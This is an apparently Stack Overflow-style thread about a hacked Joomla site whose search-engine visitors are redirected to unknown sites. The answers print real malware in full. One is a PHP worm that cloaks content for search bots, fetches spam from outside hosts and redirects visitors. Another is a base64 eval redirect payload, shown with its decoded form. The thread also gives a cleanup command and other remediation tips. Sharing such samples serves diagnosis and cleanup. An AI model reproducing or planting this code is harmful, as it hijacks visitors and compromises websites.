CODEWITHSUNDEEP
http-redirectjoomla1.5google-searchvirus
Ishan Dhingra
Ishan Dhingra

Reputation: 2462

My websites google search links are redirected to some unknown websites

Today while giving a check to my website, just found this problem.

Here is details of problem:

When I Google my website, it appears in Google result page as always.

But when I click on the link to my website in search result, It takes some time to redirect me, after processing it redirect me to some random URL (on a different domain to mine).

Also it works fine, if I try to access directly, by entering address direct through browser it works well.

This website is running Joomla Version 1.5.20.

I have already searched for this problem, I am sharing what I got after searching web.

  1. All forums says this is infected by Hacker or Virus attack.

  2. All forums Says the only solution is to re-install Joomla.

  3. Only Joomla and WordPress website are effected.

  4. This threat resides in PHP code some where.

  5. To prevent from this use updates of template, add-on etc in future.

That's all my research about, Now is there anybody, who knows how to solve this without Re-Installing and tips to prevent this in future?

Upvotes: 2

Views: 15826

Answers (4)

Igor Pavlenko
Igor Pavlenko

Reputation: 717

I had similar problem. Located corrupted files in wp core files: index.php, wp-config.php. Found this worm there Hope will help someone ! 

<?php
if(!defined('_NET'))
{   
error_reporting(0);
$NET='shl-ed1'; 
define('_NET',$NET);
if(function_exists('date_default_timezone_set')){date_default_timezone_set('America/Los_Angeles');}$sll0='http://googlecountwebs.com/';$pinj_0='http://tds-err.com/i?r=1';$pinj_1='http://tds-narod.ru/i.txt';$FNN='lnk-trans2.php';$pinj_2='yahoo';$pinj_2='bing';$pinj_3=str_replace('google',$pinj_1,$sll0);$pinj_4='site';$sll0=str_replace('google',$pinj_4,$sll0);$pinj_5='';$pinj_6='';$pinj_7='';$pinj_8='';if(!empty($_SERVER['HTTP_USER_AGENT'])){$pinj_6=$_SERVER['HTTP_USER_AGENT'];}if(!empty($_SERVER['HTTP_REFERER'])){$pinj_5=$_SERVER['HTTP_REFERER'];}if(!empty($_SERVER['REQUEST_URI'])){$pinj_7=$_SERVER['REQUEST_URI'];}if(!empty($_SERVER['REMOTE_ADDR'])){$pinj_8=$_SERVER['REMOTE_ADDR'];}if(!function_exists('get_cont')){function get_cont($pinj_9){if(function_exists('curl_init')){$pinj_10=curl_init();curl_setopt($pinj_10,CURLOPT_URL,$pinj_9);curl_setopt($pinj_10,CURLOPT_HEADER,0);curl_setopt($pinj_10,CURLOPT_NOBODY,0);curl_setopt($pinj_10,CURLOPT_TIMEOUT,10);curl_setopt($pinj_10,CURLOPT_RETURNTRANSFER,1);curl_setopt($pinj_10,CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)");$pinj_11=curl_exec($pinj_10);curl_close($pinj_10);return $pinj_11;}$pinj_12=@file_get_contents($pinj_9);return $pinj_12;}}if(!function_exists('SEbot_')){function SEbot_($pinj_13){if(strpos('-' .strtolower($pinj_13),'googlebot',0)>0){return 1;}if(strpos('-' .strtolower($pinj_13),'slurp',0)>0){return 1;}if(strpos('-' .strtolower($pinj_13),'bing',0)>0){return 1;}if(strpos('-' .strtolower($pinj_13),'msnbot',0)>0){return 1;}if(strpos('-' .strtolower($pinj_13),'yahoo',0)>0){return 1;}return 0;}}if(!function_exists('not_do_')){function not_do_($pinj_14){$pinj_15='gif|jpeg|png|js|css|swf|ico|txt|pdf|xml|jpg|pdf|doc';$pinj_16=explode("|",$pinj_15);$pinj_17=0;while($pinj_17<count($pinj_18)){if(strpos(' ' .strtolower($pinj_14),$pinj_18[$pinj_17],0)>0)return 1;$pinj_17=$pinj_17+1;}return 0;}}if(!function_exists('detect_encoding_')){function detect_encoding_($pinj_19){static $pinj_20=array('UTF-8','ASCII','Windows-1251','ISO-8859-2','ISO-8859-3','ISO-8859-4','ISO-8859-5','ISO-8859-6','ISO-8859-7','ISO-8859-8','ISO-8859-9','ISO-8859-10','ISO-8859-13','ISO-8859-14','ISO-8859-15','ISO-8859-16','ISO-8859-1','Windows-1252','Windows-1254',);foreach($pinj_20 as $pinj_21){$pinj_22=@iconv($pinj_21,$pinj_21 .'',$pinj_19);if(md5($pinj_22)== md5($pinj_19))return $pinj_21;}return null;}}if(isset($_SERVER['HTTPS'])&&($_SERVER['HTTPS']=='on')){$pinj_23='https';}else{$pinj_23='http';}$pinj_24=substr(str_replace('www.','',$_SERVER['SERVER_NAME']),0,4);if((SEbot_($pinj_6)>0)&&empty($pinj_25)&&(not_do_($pinj_7)==0)){$pinj_26=get_cont($sll0 .$FNN .'?d=' .$_SERVER['SERVER_NAME'] .'&NET=' .$NET .'&u=' .urlencode($pinj_7) .'&prot=' .$pinj_23);$pinj_25=get_cont($pinj_23 .'://' .$_SERVER['SERVER_NAME'] .$pinj_7);if(strlen($pinj_25)>200){if(strpos($pinj_26,'"ttl"',0)>0){$pinj_27=@unserialize($pinj_26);$pinj_28="\r\n" .'<meta name="description" content="' .$pinj_27['dsc'] .'"/>' ."\r\n";$pinj_29=array("'<li>.*?</li>'si","'<li [^>]*?>.*?</li>'si");$pinj_30=array("","");$pinj_31=preg_replace($pinj_29,$pinj_30,$pinj_25);$pinj_29=array("'<noscript[^>]*?>.*?</noscript>'si");$pinj_30=array("");$pinj_31=preg_replace($pinj_29,$pinj_30,$pinj_31);$pinj_31=str_replace('></a>','> </a>',$pinj_31);$pinj_31=preg_replace('/<a(.+?)href=("|\')(.+?)("|\')(.*?)>(.+?)<\/a>/i',"",$pinj_31);$pinj_31=str_replace("</li>",'',$pinj_31);$pinj_31=str_replace("<ul>",'',$pinj_31);$pinj_31=str_replace("</ul>",'',$pinj_31);$pinj_29=array("'<h1 [^>]*?>.*?</h1>'si","'<h2 [^>]*?>.*?</h2>'si","'<h2>.*?</h2>'si","'<iframe [^>]*?>.*?</iframe>'si","'<h3[^>]*?>.*?</h3>'si","'<h4[^>]*?>.*?</h4>'si","'<h5[^>]*?>.*?</h5>'si");$pinj_30=array("","","","","","","");$pinj_31=preg_replace($pinj_29,$pinj_30,$pinj_31);$pinj_32=0;$pinj_33=@explode('>',$pinj_31);$pinj_17=0;$pinj_34='';$pinj_35='';$pinj_36='';$pinj_37='';$pinj_38=0;$pinj_39=0;$pinj_40=0;if(strpos('-' .strtolower($pinj_31),'<body',0)<=0){$pinj_41=1;}else{$pinj_41=0;}while($pinj_17<count($pinj_33)){if((strpos('-' .strtolower($pinj_33[$pinj_17]),'<body',0)>0)&&($pinj_41==0)){$pinj_41=1;}$pinj_42=explode('<',$pinj_33[$pinj_17]);$pinj_42[0]=trim($pinj_42[0]);if((strlen($pinj_42[0])>40)){if((strpos($pinj_42[0],'=',0)<=0)&&(strpos($pinj_42[0],'}',0)<=0)&&(strpos($pinj_42[0],'{',0)<=0)&&(strpos($pinj_42[0],'+',0)<=0)&&(strpos($pinj_42[0],');',0)<=0)&&(!preg_match("/\.[a-zA-Z]/i",$pinj_42[0]))){if((strlen($pinj_35)<strlen($pinj_42[0]))&&(strlen($pinj_35)<80)&&($pinj_41==1)){$pinj_35=$pinj_42[0];$pinj_38=$pinj_17;}elseif((strlen($pinj_36)<strlen($pinj_42[0]))&&($pinj_41==1)){$pinj_36=$pinj_42[0];$pinj_39=$pinj_17;}elseif((strlen($pinj_37)<strlen($pinj_42[0]))&&($pinj_41==1)){$pinj_37=$pinj_42[0];$pinj_40=$pinj_17;}}}$pinj_17=$pinj_17+1;}$pinj_43="<h1>" .$pinj_27['h1'] ."</h1> \r\n " .$pinj_27['txt1'] ."";$pinj_44=$pinj_27['txt2'];$pinj_45=$pinj_27['txt3'];if($pinj_40==0){$pinj_44=$pinj_44 .' ' .$pinj_45;$pinj_45='';}if($pinj_39==0){$pinj_43=$pinj_43 .' ' .$pinj_44;$pinj_44='';}$pinj_46='';if($pinj_38==0){$pinj_46=$pinj_43;}$pinj_17=0;while($pinj_17<count($pinj_33)){$pinj_42=@explode('<',$pinj_33[$pinj_17]);$pinj_42[0]=trim($pinj_42[0]);if((strlen($pinj_42[0])>40)){if((strpos($pinj_42[0],'=',0)<=0)&&(strpos($pinj_42[0],'}',0)<=0)&&(strpos($pinj_42[0],'{',0)<=0)&&(strpos($pinj_42[0],'+',0)<=0)&&(strpos($pinj_42[0],');',0)<=0)&&(!preg_match("/\.[a-zA-Z]/i",$pinj_42[0]))){if(($pinj_17==$pinj_40)){$pinj_42[0]='-vst3-';}elseif($pinj_17==$pinj_39){$pinj_42[0]='-vst2-';}elseif($pinj_17==$pinj_38){$pinj_42[0]='-vst1-';}else{$pinj_42[0]='';}}}$pinj_33[$pinj_17]=@implode('<',$pinj_42);if(isset($pinj_47)){echo $pinj_33[$pinj_17];exit;}if($pinj_34==''){$pinj_34=$pinj_33[$pinj_17];}else{if((strpos(strtolower('-' .$pinj_33[$pinj_17]),'meta',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'keywords',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'meta',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'description',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'meta',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'title',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'property',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'og:',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'link',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'alternate',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'link',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'canonical',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'rel=',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'alternate',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'rel=',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'contents',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'charset=',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'<title',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'</title',0)<=0)){$pinj_34=$pinj_34 .'> ' .$pinj_28 ."\r\n" .' <title>' .$pinj_27['ttl'] .'</title';$pinj_48=2;}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'<body',0)>0)){$pinj_34=$pinj_34 .'>' .$pinj_33[$pinj_17] .'> ' .$pinj_46;$pinj_48=1;}else{if(isset($pinj_48)&&($pinj_48==1)){$pinj_34=$pinj_34 .'' .$pinj_33[$pinj_17];$pinj_48=0;}elseif(isset($pinj_48)&&($pinj_48==2)){$pinj_34=$pinj_34 .'';$pinj_48=0;}else{$pinj_34=$pinj_34 .'>' .$pinj_33[$pinj_17];}}}$pinj_17=$pinj_17+1;}$pinj_34=str_replace(array('-vst1-','-vst2-','-vst3-'),array($pinj_43,$pinj_44,$pinj_45),$pinj_34);$pinj_34=str_replace("</head>",'<meta charset="utf-8"> </head>',$pinj_34);$pinj_34=str_replace("</HEAD>",'<meta charset="utf-8"> </head>',$pinj_34);$pinj_34=str_replace("</Head>",'<meta charset="utf-8"> </head>',$pinj_34);$pinj_34=str_replace('< <','<',$pinj_34);$pinj_34=str_replace('<?<','<',$pinj_34);$pinj_34=str_replace('<<','<',$pinj_34);$pinj_34=str_replace("<\n",'',$pinj_34);$pinj_34=preg_replace("/\d{2}\.\d{2}.\d{4}/","",$pinj_34);$pinj_34=preg_replace("/\d{2}\-\d{2}-\d{4}/","",$pinj_34);$pinj_34=preg_replace("/\d{1}\.\d{2}.\d{4}/","",$pinj_34);$pinj_34=preg_replace("/\d{4}\.\d{2}.\d{2}/","",$pinj_34);$pinj_34=preg_replace("/\d{4}\-\d{2}-\d{2}/","",$pinj_34);$pinj_34=preg_replace('/\n\n+/',"\n",$pinj_34);$pinj_34=preg_replace('/\r\n\r\n+/',"\r\n",$pinj_34);$pinj_34=preg_replace('/  \n  \n+/',"\n",$pinj_34);$pinj_34=str_replace("2010",date('Y'),$pinj_34);$pinj_34=str_replace("2011",date('Y'),$pinj_34);$pinj_34=str_replace("2012",date('Y'),$pinj_34);$pinj_34=str_replace("2013",date('Y'),$pinj_34);$pinj_34=str_replace("2014",date('Y'),$pinj_34);$pinj_34=str_replace("2015",date('Y'),$pinj_34);$pinj_34=str_replace("2016",date('Y'),$pinj_34);$pinj_34=str_replace("2017",date('Y'),$pinj_34);$pinj_49='"ab","az","ay","sq","en","en-us","ar","hy","as","af","ba","be","bn","bg","br","cy","hu","vi","gl","nl","el","ka","gn","da","zu","iw","ji","in","ia","ga","is","es","it","kk","km","ca","ks","qu","ky","zh","ko","co","ku","lo","lv","la","lt","mg","ms","mt","mi","mk","mo","mn","na","de","ne","no","pa","fa","pl","pt","ps","rm","ro","ru","sm","sa","sr","sk","sl","so","sw","su","tl","tg","th","ta","tt","bo","to","tr","tk","uz","uk","ur","fj","fi","fr","fy","ha","hi","hr","cs","sv","eo","et","jw","ja"';$pinj_50=explode(',',$pinj_49);$pinj_34=str_replace($pinj_50,'"' .$pinj_27['lang'] .'"',$pinj_34);echo $pinj_34;exit;}$pinj_51=$pinj_25;$pinj_52=strpos(strtolower($pinj_25),"<body",0);$pinj_53=strpos(strtolower($pinj_25),">",$pinj_52);if(($pinj_52>0)&&($pinj_53>0)){$pinj_25=substr($pinj_51,0,$pinj_53+1) .$pinj_26 .'' .substr($pinj_51,$pinj_53+1);if(strpos(strtolower('-' .$pinj_6),'sape',0)>0){$pinj_25=$pinj_25 .'=*OK*=';}echo $pinj_25;exit;}}}if(isset($pinj_5)&&((strpos($pinj_5,'ogle.',0)>0)||(strpos($pinj_5,'ing.',0)>0)||(strpos($pinj_5,'ahoo.',0)>0))){$pinj_54='mkke';$pinj_55=70;if(!isset($_COOKIE[$pinj_54])||($_COOKIE[$pinj_54]<(time()))){$pinj_56=get_cont($sll0 .$FNN .'?rd=1&d=' .$_SERVER['SERVER_NAME'] .'&NET=' .$NET .'&u=' .urlencode($pinj_7) .'&prot=' .$pinj_23);if(strlen($pinj_56,'<!-- -->',0)>0)$pinj_55=30000;if(strlen($pinj_56)>10){$pinj_57=get_cont($pinj_23 .'://' .$_SERVER['SERVER_NAME'] .$pinj_7);if(strlen($pinj_57)>400){$pinj_56=str_replace('-SID-',$NET,$pinj_56);$pinj_57=str_replace('</head>',$pinj_56 .'</head>',$pinj_57);setcookie($pinj_54,(time()+$pinj_55),(time()+$pinj_55*2),'/','.' .str_replace('www.','',$_SERVER['SERVER_NAME']));echo $pinj_57;exit;}}}}

Blockquote

Upvotes: 0

Ishan Dhingra
Ishan Dhingra

Reputation: 2462

Finally got the problem sorted out, before deadline, here are the details:

Firstly what the threat was:

Its a simple Base64 encoded PHP script, which I found on all files of my sites, here is how it looks:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGluaWEuenlucy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));

This is base64 encoded code now here is the actual code of PHP which is going to run, after Decoding this string:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://hinia.zyns.com/");
exit();
}
}
}
}
}

As you can see in the code this will only target searching engines, so now clear that's the threat.

Now any guess how much time this is repeated, through my website???

you would not believe, its about 10,000 times repeated, I got it every where whether it is Modules, Plugins, Admin, Library etc, in sort every single file.

So to make my website work again I had to remove every single line, I did the same, as a result of it you may check website running well again.

Upvotes: 8

Carlos
Carlos

Reputation: 11

This is a regular issue that some CMS presents. Here is a script that solver 100% your issue.

find . \( -name "*.php" \) -exec grep -Hn "[\t]*eval(base64_decode(.*));" {} \; -exec sed -i 's/[\t]*eval(base64_decode(.*));//g' {} \;

you have to run it in console.

Upvotes: 1

Mantas Vaitkūnas
Mantas Vaitkūnas

Reputation: 744

Try to disable plugins, here is a tutorial: http://www.ostraining.com/blog/joomla/disable-a-joomla-plugin/ if it will works, you will be able to identify which plugin is infected.

Upvotes: 2

Related Questions